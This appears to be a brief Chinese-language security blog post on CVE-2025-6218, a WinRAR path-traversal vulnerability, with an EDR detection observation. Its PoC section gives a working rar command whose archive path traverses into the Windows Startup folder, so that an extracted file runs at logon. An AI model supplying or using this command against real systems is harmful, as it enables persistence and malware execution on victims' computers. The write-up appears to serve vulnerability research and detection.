此漏洞是由資安研究人員whs3-detonator發現的。 關於此漏洞的資訊請見：https://www.zerodayinitiative.com/advisories/ZDI-25-409/

不多說關於此漏洞的細節，直接進入主題。

PoC#

直接在Linux上安裝rar並執行以下命令。

rar a -ap' \.. \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\' {FileName}.zip {File}

在Windows開啟壓縮檔後可以發現一個帶有空白名稱資料夾。 點進去到最底層，可以看到上方欄位的路徑與先前命令中指定的路徑結構相同。

CVE-2025-6218在EDR上的偵測#

使用WinRAR將CVE-2025-6218.rar解壓縮到當前目錄，即”C:\Users\{username}\Desktop\”。 實際上WinRAR.exe是在”C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\“下建立惡意程式。